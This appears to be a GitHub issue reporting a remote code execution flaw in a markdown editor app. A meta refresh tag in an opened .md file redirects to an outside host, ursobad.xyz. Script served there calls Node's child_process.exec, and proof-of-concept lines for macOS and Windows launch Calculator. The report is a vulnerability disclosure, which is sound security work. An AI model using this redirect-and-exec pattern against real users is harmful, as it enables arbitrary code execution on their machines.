Open AliceLacie opened 1 year ago
Author: bob11.devranger@gmail.com OS: macOS Version: 7.1.5
It has been possible to trigger Remote Code Execution via meta redirect
When you open the .md file containing the mata tag, the meta tag is applied and the location can be moved to the hacker server via meta redirect.
[macOS] file content
<meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/a.html"></meta>
<!-- a.html--> <script> require('child_process').exec('open -a /System/Applications/Calculator.app') </script>
[Windows] file content
<meta http-equiv="refresh" content="0; url=https://ursobad.xyz/xss/b.html"></meta>
<!-- b.html--> <script> require('child_process').exec('calc') </script>
https://drive.google.com/file/d/1pEjEgBIuv2-cWw9is5bG8BeqC5ngfsnA/view?usp=sharing
Summary
It has been possible to trigger Remote Code Execution via meta redirect
Description
When you open the .md file containing the mata tag, the meta tag is applied and the location can be moved to the hacker server via meta redirect.
[macOS] file content
[Windows] file content
PoC
https://drive.google.com/file/d/1pEjEgBIuv2-cWw9is5bG8BeqC5ngfsnA/view?usp=sharing
What’s More?